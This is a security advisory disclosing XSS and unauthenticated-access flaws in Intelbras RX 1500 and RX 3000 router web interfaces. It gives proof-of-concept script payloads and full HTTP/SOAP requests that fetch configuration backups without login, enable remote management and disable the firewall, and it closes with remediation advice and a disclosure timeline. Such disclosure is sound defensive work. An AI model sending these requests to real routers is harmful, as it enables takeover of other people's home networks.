=====[Tempest Security
Intelligence]==========================================

Multiple vulnerabilities in the web management interface of Intelbras
routers

Author: Gabriel Lima <gabriel lima () tempest com br >

=====[Table of
Contents]======================================================

1. Overview

2. Detailed description

3. Other contexts & solutions

4. Acknowledgements

5. Timeline

6. References

=====[1.
Overview]============================================================

* Systems affected:

Intelbras web interface RX 1500 - 2.2.9

(verified) (other routers/versions may be affected)

Intelbras web interface RX 3000 - 1.0.11

(verified) (other routers/versions may be affected)

* Release date: 07/14/2025

* Impact: Several vulnerabilities were found providing retrieval of
administrative session tokens and direct unauthenticated access to
sensitive features that allow the recovery of current router configuration.

The new generation of connection comes via Wi-Fi 6 technology, delivering
more speed, more network efficiency and less interference. Router RX 1500
[1] and RX 3000 [2] are ideal for residential plans with high-speed plans
and high-performance connections.

=====[2. Detailed
description]================================================

The web management system for the RX 1500 and 3000 routers is designed to
help the device’s administrator configure the device in the best way for
their needs. However, upon carrying out a security research, multiple
vulnerabilities related to XSS and direct unauthenticated access were
spotted.

As a result of performing this research, two types of vulnerabilities were
found: Cross-Site Scripting (XSS) vulnerabilities and Direct
Unauthenticated Access vulnerabilities.

In regard to the XSS vulnerabilities, as a means to portray impact
outcomes, an unauthenticated attacker may gain administrative access to the
system and have full control of the router. On the other hand, an attacker
with administrator access is able to create persistence to maintain access.

Furthermore, in regard to the direct and unauthenticated access
vulnerabilities, the application hosts endpoints that provide the
retrieval  of log files and the router's configuration file, which in turn,
stores the device's password and its current settings. An important
highlight regards the fact that any feature can be accessed in an
unauthenticated manner, as long as an administrator is authenticated and
active within the system.

The following section dissects the XSS issues.

2.1 Possibility of injecting JavaScript code into client names (XSS) -
CVE-2025-26064

An authenticated threat may inject persistent JavaScript from the connected
clients configuration feature (Home > Connected clients). This problem
occurs due to the lack of character handling in the “Name” field.

As proof of concept, the following payload was used:

&lt;script&gt;alert(1)&lt;/script&gt;

Payload used in plain text:

<script>alert(1)</script>

The following request pinpoints the insertion of the payload:

[snippet]

POST /HNAP1/ HTTP/1.1

Host: 10.0.0.1

Content-Type: text/xml; charset=utf-8

SOAPAction: "http://purenetworks.com/HNAP1/SetClientInfo"

X-Requested-With: XMLHttpRequest

Content-Length: 596

Cookie: uid=COOKIE-HERE

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="
http://www.w3.org/2001/XMLSchema" xmlns:soap="
http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetClientInfo xmlns="
http://purenetworks.com/HNAP1/
"><ClientInfoLists><ClientInfo><MacAddress>Client-MacAddresss</MacAddress><NickName>PAYLOAD-IN-HTML-ENCODE</NickName><ReserveIP></ReserveIP><secRouter></secRouter><Type>WIFI_5G</Type><COMMAND>change</COMMAND></ClientInfo></ClientInfoLists><COMMAND></COMMAND></SetClientInfo></soap:Body></soap:Envelope>

[/snippet]

Upon submitting this request, please note the outcome rendered within the
context of the victim's browser.

2.2 Possibility of injecting JavaScript code into the name of the visiting
network (XSS) - CVE-2025-26064

An authenticated threat may inject persistent JavaScript from the Guest
Network functionality (in the Settings > Wi-Fi > Guest Network menu). This
problem occurs due to the lack of character handling in the “Wi-Fi network
name” field (both in 2.4GHz and 5GHz).

As a proof of concept, the following payloads were HTML encoded and
inserted into each field:

2.4GHz network: &lt;script&gt;alert(1)&lt;/script&gt;

5GHz network: &lt;script&gt;alert(2)&lt;/script&gt;

Payloads used in plain text:

2.4GHz network: <script>alert(1)</script>

5GHz network: <script>alert(2)</script>

The following portrays an example of the request submitted by the attacker:

[snippet]

POST /HNAP1/ HTTP/1.1

Host: 10.0.0.1

Content-Type: text/xml; charset=utf-8

SOAPAction: "http://purenetworks.com/HNAP1/SetMultipleActions"

X-Requested-With: XMLHttpRequest

Content-Length: 2991

Cookie: uid=COOKIE-HERE

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="
http://www.w3.org/2001/XMLSchema" xmlns:soap="
http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetMultipleActions
xmlns="http://purenetworks.com/HNAP1/"><SetWLanRadioSettings xmlns="
http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><OpenMainWiFiFirst>false</OpenMainWiFiFirst><Enabled>true</Enabled><Mode>802.11bgn</Mode><SSID>PAYLOAD-IN-HTML-ENCODE-2.4GHz</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>20/40</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>false</QoS><ScheduleName>Always</ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><WmmCapable></WmmCapable><MuOfdma></MuOfdma><MuMimo></MuMimo><Beamforming></Beamforming><ETxBfEnCond></ETxBfEnCond><TWTSupport></TWTSupport><BssColor></BssColor></SetWLanRadioSettings><SetWLanRadioSecurity
xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><Enabled>false</Enabled><Type>OPEN</Type><Encryption>NONE</Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>ROUTER-KEY</Key></SetWLanRadioSecurity><SetWLanRadioSettings
xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><OpenMainWiFiFirst>false</OpenMainWiFiFirst><Enabled>true</Enabled><Mode>802.11anac</Mode><SSID>PAYLOAD-IN-HTML-ENCODE-5GHz</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>20/40/80</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>false</QoS><ScheduleName></ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><WmmCapable></WmmCapable><MuOfdma></MuOfdma><MuMimo></MuMimo><Beamforming></Beamforming><ETxBfEnCond></ETxBfEnCond><TWTSupport></TWTSupport><BssColor></BssColor></SetWLanRadioSettings><SetWLanRadioSecurity
xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><Enabled>false</Enabled><Type>OPEN</Type><Encryption>NONE</Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>ROUTER-KEY</Key></SetWLanRadioSecurity><SetGuestZoneRouterSettings
xmlns="http://purenetworks.com/HNAP1/
"><InternetAccessOnly>false</InternetAccessOnly><IPAddress></IPAddress><SubnetMask></SubnetMask><DHCPServer>true</DHCPServer><DHCPRangeStart></DHCPRangeStart><DHCPRangeEnd></DHCPRangeEnd><DHCPLeaseTime>0</DHCPLeaseTime></SetGuestZoneRouterSettings></SetMultipleActions></soap:Body></soap:Envelope>

[/snippet]

By accessing the system's home page (namely: the Status page), one can
observe the JavaScript rendering for both fields.

2.3 Possibility of multiple JavaScript code injections in the Site Survey
feature (XSS) - CVE-2025-26063

The “Site Survey” feature (Management > Site Survey) has the purpose of
displaying nearby active WIFI networks, and presenting their ESSIDs among
other details. However, due to the lack of character handling, whenever an
attacker creates a fake WIFI network containing HTML/JavaScript code (e.g.
“<script>alert(1)</script>”), and the router administrator uses this
feature, the malicious code will be executed at the moment the tab listing
all available ESSIDs is opened.

As a proof of concept, an SSID with the following name was created:

<script>alert(1)</script>

The following portrays an example of the request made by the administrator
upon starting “Site Survey” scan:

[snippet]

POST /HNAP1/ HTTP/1.1

Host: [redacted]

SOAPAction: "http://purenetworks.com/HNAP1/igd_wifi_list_scan_start"

X-Requested-With: XMLHttpRequest

Content-Length: 357

Cookie: [redacted]

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="
http://www.w3.org/2001/XMLSchema" xmlns:soap="
http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><igd_wifi_list_scan_start
xmlns="http://purenetworks.com/HNAP1/
"><radio>2.4g</radio></igd_wifi_list_scan_start></soap:Body></soap:Envelope>

[/snippet]

The XSS is executed by hovering the mouse pointer over the network's name
(highlighted in the graphic presented within the router’s/device’s web
management interface) or by opening the nearby devices section.

The following section dissects the direct unauthenticated access issues.

2.4 Incorrect Access Control - CVE-2025-26062

This session will address 3 access control breach vulnerabilities,
considered by mitre to be duplicates. For better understanding, they will
be considered only as one topic.

2.4.1 Possibility of retrieving router logs

The given router's administrative interface provides a feature (Management
> System log) that allows an authenticated entity (e.g: an administrator)
to retrieve the router's log file, which may contain potentially sensitive
debug information. However, due to the lack of permissions validation, an
unauthenticated entity can download the file without performing the
authentication procedure.

The following is an example request used as proof of concept:

[snippet]

POST /cgi-bin/dllog.cgi HTTP/1.1

Host: 10.0.0.1

Content-Type: application/x-www-form-urlencoded

Content-Length: 13

Export=Export

[/snippet]

As a result, a log file containing potentially sensitive information is
provided for download.


2.4.2 Possibility of recovering backups of router settings

The given router's administrative interface provides a feature (Management
> System) that allows an authenticated entity (e.g: an administrator) to
retrieve the router's current configuration file, which may contain
potentially sensitive information pertaining to the environment. However,
due to the lack of permissions validation, an unauthenticated entity can
download the file without performing the authentication procedure.

To exploit the aforementioned concept, the following snippet illustrates
the request made at the affected point by an unauthenticated attacker
retrieving the router's configuration file, as well as showing part of the
contents of the ".cfg" file in the request response:

[snippet]

POST /cgi-bin/ExportSettings.sh HTTP/1.1

Host: 10.0.0.1

Content-Type: application/x-www-form-urlencoded

Content-Length: 13

Export=Export

[/snippet]

As a result of submitting the previously shown request, the retrieval of
the  .cfg backup file is done without the need for providing proper
authorization.

2.4.3 Possibility of accessing various functionalities in an
unauthenticated manner

Various router features, such as editing firewall rules, configuring Wi-Fi
specifications, and changing router security rules and policies, were found
to be accessible in an unauthenticated manner if an administrator
synchronically accessed the router's administrative interface at the moment
of exploitation.

In other words, the only caveat necessary to exploit this unauthenticated
access is having an administrator logged in at the moment of exploitation.

The following snippet represents a request to render the router's
administrative interface publicly accessible (e.g.: accessible from the
Internet):

[snippet]

POST /HNAP1/ HTTP/1.1

Host: 10.0.0.1

Content-Type: text/xml; charset=utf-8

SOAPAction: "http://purenetworks.com/HNAP1/SetAdministrationSettings"

X-Requested-With: XMLHttpRequest

Content-Length: 491

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="
http://www.w3.org/2001/XMLSchema" xmlns:soap="
http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetAdministrationSettings
xmlns="http://purenetworks.com/HNAP1/
"><HTTPS>false</HTTPS><RemoteMgt>true</RemoteMgt><RemoteMgtPort>8080</RemoteMgtPort><RemoteMgtHTTPS>false</RemoteMgtHTTPS><InboundFilter></InboundFilter></SetAdministrationSettings></soap:Body></soap:Envelope>

[/snippet]

The following snippet portrays a request with the purpose of disabling the
router's Denial of Service (DoS) protection:

[snippet]

POST /HNAP1/ HTTP/1.1

Host: 10.0.0.1

Content-Type: text/xml; charset=utf-8

SOAPAction: "http://purenetworks.com/HNAP1/SetFirewallEnableSettings"

X-Requested-With: XMLHttpRequest

Content-Length: 381

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="
http://www.w3.org/2001/XMLSchema" xmlns:soap="
http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetFirewallEnableSettings
xmlns="http://purenetworks.com/HNAP1/
"><Firewall_Enabled>false</Firewall_Enabled></SetFirewallEnableSettings></soap:Body></soap:Envelope>

[/snippet]

Other features are accessible in an unauthenticated manner, as long as the
request is sent when the administrator is active.

According to the arguments disclosed in this section, various attack
vectors for administrative access originating from the perspective of an
unauthenticated user becomes feasible. Furthermore, once authenticated as
an administrator, an attacker would be able to generate persistence with
the same approaches.

=====[3. Other contexts &
solutions]==========================================

In regard to the XSS disclosed issues, it is recommended that all
information coming from third parties (databases, other applications,
client-side, etc.) have their special characters converted to the **HTML
Entities** character set. Moreover, the data must be semantically filtered
to guarantee that it conforms to the expected format and is free of any
undesired characters.

In regard to the unauthenticated access disclosed issues, it is strongly
recommended that changes be made to the application's existing session
management and access control, such that access to sensitive
functionalities is available only to authenticated users, and that these
users perform only actions permitted by their authorization profile.

Moreover, it is important to highlight that all logic that determines
whether a user has the necessary permissions to perform a certain action
must execute **exclusively on the server-side**.

=====[4.
Acknowledgements]====================================================

- Joaquim Brasil de Oliveira < joaquim brasil () tempest com br >

- Tempest Security Intelligence[3]

=====[5.
Timeline]============================================================

07/15/2024 - We contacted the manufacturer reporting an XSS vulnerability
in the Site Survey functionality;

07/16/2024 - The vendor requested contact information;

07/17/2024 - Contact information has been sent to the supplier;

07/17/2024 - The vendor has begun the process of validating and
acknowledging the first bug reported;

07/22/2024 - A full report has been sent with all the other discovered
vulnerabilities;

07/25/2024 - The vendor acknowledged all the vulnerabilities reported in
the RX 1500 and RX 3000 devices;

09/19/2024 - The vendor has released the beta version of the corrected
firmware 2.2.12

09/23/2024 - All points have been retested and fixed;

01/27/2025 - Request CVE IDs from MITRE;

02/24/2025 - MITRE sent the CVEs IDs;

07/14/2025 - Publication date.



=====[6.
References]==========================================================

[1] <http://www.asus.com/Networking/RTAC68U/>
https://www.intelbras.com/pt-br/roteador-wi-fi-6-dual-band-rx-1500

[2] http://intelbras.com/pt-br/roteador-wireless-rx-3000

[3] https://tempest.com.br

-- 

*Esta mensagem é para uso exclusivo de seu destinatário e pode conter 
informações privilegiadas e confidenciais. Todas as informações aqui 
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a 
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é 
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste 
caso, por favor, notifique o remetente da mesma e destrua imediatamente a 
mensagem.*

*
*
*This message is intended solely for the use of its 
addressee and may contain privileged or confidential information. All 
information contained herein shall be treated as confidential and shall not 
be disclosed to any third party without Tempest’s prior written approval. 
If you are not the addressee you should not distribute, copy or file this 
message. In this case, please notify the sender and destroy its contents 
immediately.**
*
*
*